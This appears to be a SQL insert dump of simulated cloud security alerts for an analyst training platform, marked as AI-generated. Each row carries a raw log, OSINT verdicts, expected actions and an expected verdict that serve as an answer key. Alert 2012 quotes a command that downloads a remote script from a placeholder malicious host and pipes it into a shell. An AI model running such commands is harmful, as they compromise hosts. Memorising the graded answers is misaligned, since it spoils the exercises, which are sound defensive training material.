(2003, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unusual access pattern detected on an S3 bucket. Data exfiltration attempt suspected from an external IP address.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"s3_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"aws s3 cp s3://bucket-name/sensitive-data .\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 134 times for data exfiltration attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account accessed S3 bucket\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"aws s3 cp s3://bucket-name/sensitive-data .\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious command-line execution for data copy\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External IP involved in data exfiltration from AWS S3 bucket, indicating a true positive data leak.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2004, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'Anomalous activity detected: Unauthorized role assignment to a user account with potentially escalated privileges.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:47:45Z\",\"event_type\":\"role_assignment\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.0.5\",\"username\":\"malicious_user\",\"hostname\":\"azure.com\",\"request_body\":\"RoleAssignment: Contributor\",\"command_line\":\"az role assignment create --assignee user@example.com --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User account associated with privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee user@example.com --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential unauthorized privilege escalation command\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The assignment of elevated roles without authorization is a clear indicator of privilege escalation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2005, 'GCP Service Account Hijacking', 'critical', 'GCP SCC', 'Suspicious activity detected from a compromised service account, indicating potential hijacking and misuse.', 'Credential Attack', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:23:10Z\",\"event_type\":\"service_account_activity\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"10.1.1.2\",\"username\":\"compromised_service_account\",\"hostname\":\"gcp.google.com\",\"request_body\":\"Accessing cloud storage buckets\",\"command_line\":\"gcloud auth activate-service-account --key-file=compromised-key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to unauthorized service account activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account potentially compromised and misused\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=compromised-key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of service account activation command with compromised credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Service account hijacking attempts confirmed by unauthorized access and command execution.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2006, 'Kubernetes API Access from Unauthorized IP', 'high', 'Prisma Cloud', 'Detected access to Kubernetes API from an IP not whitelisted, potentially indicating a reconnaissance attempt.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:32:20Z\",\"event_type\":\"api_access\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.10.15\",\"username\":\"kube_admin\",\"hostname\":\"k8s_api_server\",\"request_body\":\"GET /api/v1/namespaces/default/pods\",\"command_line\":\"kubectl get pods --namespace default\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"kube_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Admin user account accessing Kubernetes API\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl get pods --namespace default\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious command potentially used for reconnaissance\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized IP accessing Kubernetes API suggests potential lateral movement within the network.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2007, 'Potential Serverless Function Exploitation', 'medium', 'Wiz', 'Detected unusual execution pattern in serverless function, potentially indicating exploitation.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.2.3.4\",\"username\":\"lambda_function\",\"hostname\":\"aws_lambda\",\"request_body\":\"POST /run-function\",\"command_line\":\"node exploit.js\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple serverless function exploitations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"lambda_function\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Lambda function execution detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"node exploit.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of potentially malicious JavaScript code\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"Malicious IP executing unusual patterns in serverless function indicates potential exploitation attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2008, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized external IP accessed sensitive files in an S3 bucket, indicating a potential data exfiltration attempt.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:00Z\",\"event_type\":\"access_denied\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"N/A\",\"username\":\"external_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive_data/file1.csv HTTP/1.1\",\"command_line\":\"N/A\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 125 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"external_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in organization\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"s3.amazonaws.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate AWS service\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External IP accessing sensitive data indicates a clear data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2009, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An internal user account attempted unauthorized privilege escalation using PowerShell scripts.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.8\",\"username\":\"jdoe\",\"hostname\":\"azure-vm-01\",\"request_body\":\"N/A\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\escalate.ps1\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the organization\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\escalate.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script identified as malicious for privilege escalation\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected for this user\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PowerShell scripts for privilege escalation is a strong indicator of a lateral movement attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2010, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Unauthorized use of a service account was detected, possibly indicating hijacking and subsequent misuse.', 'Credential Attack', 'T1528', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"35.192.0.2\",\"username\":\"service-account@project.iam.gserviceaccount.com\",\"hostname\":\"gcp-instance-1\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@project.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account being used in unauthorized context\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"gcp-instance-1\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate GCP instance\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized access attempts using a service account indicate possible hijacking.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2011, 'Prisma Cloud Unauthorized IAM Role Creation', 'high', 'Prisma Cloud', 'A new IAM role was created without proper authorization, suggesting a potential privilege escalation attempt.', 'Credential Attack', 'T1098', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:05:00Z\",\"event_type\":\"role_creation\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"N/A\",\"username\":\"admin_user\",\"hostname\":\"prisma-cloud-instance\",\"request_body\":\"CreateRole: {\\\"RoleName\\\": \\\"AdminAccess\\\", \\\"Permissions\\\": \\\"*\\\"}\",\"command_line\":\"N/A\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in role creation\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual role creation activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"CreateRole: {\\\"RoleName\\\": \\\"AdminAccess\\\", \\\"Permissions\\\": \\\"*\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload indicates attempt to grant excessive permissions\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Creating roles with excessive permissions without authorization is indicative of privilege escalation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2012, 'Wiz Kubernetes Cluster Compromise Detected', 'critical', 'Wiz', 'Suspicious activity detected involving the execution of unauthorized commands on a Kubernetes cluster node.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"192.168.2.11\",\"username\":\"k8s-node-user\",\"hostname\":\"k8s-cluster-node-3\",\"request_body\":\"N/A\",\"command_line\":\"kubectl exec -- /bin/sh -c \'curl http://malicious-site.com/exploit.sh | sh\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address within Kubernetes cluster\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec -- /bin/sh -c \'curl http://malicious-site.com/exploit.sh | sh\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution involves downloading and executing a remote script\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"k8s-node-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User account activity inconsistent with normal operations\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The execution of unauthorized commands on a Kubernetes node suggests a compromise and lateral movement attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2013, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An S3 bucket was accessed from an unfamiliar IP address, and data was exfiltrated. The access pattern matches known data exfiltration behavior.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:45:00Z\",\"event_type\":\"s3_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"198.51.100.10\",\"username\":\"s3_admin\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"GET /secret-data.txt HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"s3_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal AWS account used for regular operations\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /secret-data.txt HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Unusual access pattern detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The source IP has a history of malicious activity and accessed sensitive data, confirming a true positive for data exfiltration.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2014, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'A potential privilege escalation was detected in Azure IAM. A user attempted to assign themselves admin roles.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:00Z\",\"event_type\":\"role_assignment\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"regular_user\",\"hostname\":\"azure-ad\",\"request_body\":\"\",\"command_line\":\"az role assignment create --assignee regular_user --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"regular_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual privilege escalation attempt by a non-admin user\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee regular_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates an attempt to escalate privileges\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of admin-level commands by a regular user from a suspicious IP indicates a true positive for privilege escalation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2015, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'A service account was accessed from a foreign IP address, indicating potential hijacking.', 'Credential Attack', 'T1556', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"api_call\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"\",\"username\":\"service-account@gcp-project.iam.gserviceaccount.com\",\"hostname\":\"gcp-instance\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@gcp-project.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account accessed from a non-standard location\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in previous hijacking attempts\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The access of a service account from a known malicious IP suggests a hijacking attempt, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2016, 'Unauthorized Kubernetes Cluster Access', 'high', 'Prisma Cloud', 'Detected unauthorized access to a Kubernetes cluster from an unknown IP, potentially leading to lateral movement.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:00:00Z\",\"event_type\":\"kube_access\",\"src_ip\":\"198.51.100.34\",\"dst_ip\":\"10.0.0.5\",\"username\":\"kube_admin\",\"hostname\":\"k8s-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec --namespace=default -it pod-123 -- /bin/sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to unauthorized access attempts on Kubernetes clusters\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal Kubernetes node IP\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl exec --namespace=default -it pod-123 -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in lateral movement attacks\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of administrative commands from a non-standard IP indicates a lateral movement attempt, confirming a true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2017, 'Suspicious AWS Lambda Function Invocation', 'medium', 'Wiz', 'A Lambda function was invoked by an unauthorized user, indicating potential misuse for data processing.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:30:00Z\",\"event_type\":\"lambda_invocation\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"aws-lambda\",\"request_body\":\"{\\\"action\\\":\\\"process_data\\\",\\\"data\\\":\\\"Zm9vYmFyMTIz\\\"}\",\"command_line\":\"aws lambda invoke --function-name processDataFunction outputfile.txt\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized AWS Lambda function invocations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"lambda_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User has no prior invocation history\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"{\\\"action\\\":\\\"process_data\\\",\\\"data\\\":\\\"Zm9vYmFyMTIz\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Base64 encoded data processed without authorization\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name processDataFunction outputfile.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used to invoke unauthorized data processing\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The invocation from a malicious IP using unauthorized commands confirms misuse of Lambda functions, indicating a 
true positive.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2018, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Anomalous behavior detected for a GCP service account with administrative privileges. Suspicious API calls were made from an unusual IP address, indicating possible hijacking.', 'Credential Attack', 'T1528', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:30Z\",\"event_type\":\"api_call\",\"src_ip\":\"203.0.113.58\",\"dst_ip\":\"10.0.0.5\",\"username\":\"svc-admin-account\",\"hostname\":\"gcp-instance-1\",\"request_body\":null,\"command_line\":\"gcloud compute instances list --project=myproject\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.58\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"svc-admin-account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account used internally in the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP was flagged for malicious activity and the service account made unauthorized API calls.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2019, 'Azure Suspicious Administrative Activity', 'high', 'Azure Defender', 'Unusual administrative actions detected from an internal IP address. Activity pattern resembles a privilege escalation attempt.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:45:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"10.1.2.3\",\"dst_ip\":\"10.1.2.5\",\"username\":\"admin_user\",\"hostname\":\"azure-vm-2\",\"request_body\":null,\"command_line\":\"net user admin_user /add\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal corporate network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User account belongs to authorized personnel\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Activity was performed by an authorized administrator from an internal IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
